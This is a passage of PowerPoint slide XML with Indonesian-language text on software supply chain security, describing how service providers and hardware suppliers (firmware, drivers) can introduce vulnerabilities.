            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berperan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keras</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumpukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
